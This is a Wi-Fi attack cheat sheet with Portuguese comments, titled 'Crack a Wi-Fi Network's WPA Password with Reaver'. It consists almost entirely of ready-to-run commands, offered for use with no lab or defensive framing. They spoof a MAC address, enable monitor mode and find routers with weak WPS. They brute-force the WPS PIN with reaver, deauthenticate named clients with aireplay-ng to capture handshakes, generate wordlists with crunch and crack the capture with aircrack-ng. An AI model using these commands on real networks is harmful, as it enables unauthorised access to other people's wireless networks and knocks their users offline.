Crack a Wi-Fi Network’s WPA Password with Reaver

Crack a Wi-Fi Network’s WPA Password with Reaver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
 
#Vulnerabilidade WPS
#configura wifi
iwconfig 
 
#trocar mac
ifconfig wlan0 down
ifconfig wlan0 hw ether A4:5D:36:C2:EA:64 
ifconfig wlan0 up 
 
#placa em mono monitor
airmon-zc start wlan0
airmon-ng start wlan0
 
#quais roteadores vulneraveis ao atrack
wash -i mon0
 
#atraque de vulnerability WPS tentar descobrir o pin
reaver -i mon0 -vv -b "BSSSID" -c "canal"
reaver -i mon0 -vv -b 64:66:B3:B8:12:1C -c 1
 
#Força Bruta captura pacotes 
airodump-ng mon0
airodump-ng --bssid 64:66:B3:B8:12:1C -c 1 --write JCipriani1 mon0
airodump-ng --bssid 28:BE:9B:6F:2E:21 -c 6 --write WPAcrack mon0
 
#Força reautenticacao - para capturar hash
aireplay-ng --deauth 5 -a 64:66:B3:B8:12:1C -c 00:18:E7:79:66:7D mon0
aireplay-ng --deauth 10 -a 28:BE:9B:6F:2E:21 -c 90:00:4E:B5:1F:7B mon0
aireplay-ng -1 0 -e horcer -a 00:50:18:4C:A5:02 -h 00:13:A7:12:3C:5B ath0
 
#Ataque de força brutas
# criar a wordlist
crunch 1 4 abcd -o wordlist.txt
crunch 1 10 JLCi0123456789 -o wordlist.txt
crunch 1 10 0123456789 -o wordlist.txt
 
#conta o numero de linhas
wc -l wordlist.txt
 
#Atack forca bruta com dicionario de dades
aircrack-ng "nome do arquivo que você criou cap" -w "nome do arquivo de dicionário"
aircrack-ng JCip-01.cap -w wordlist.txt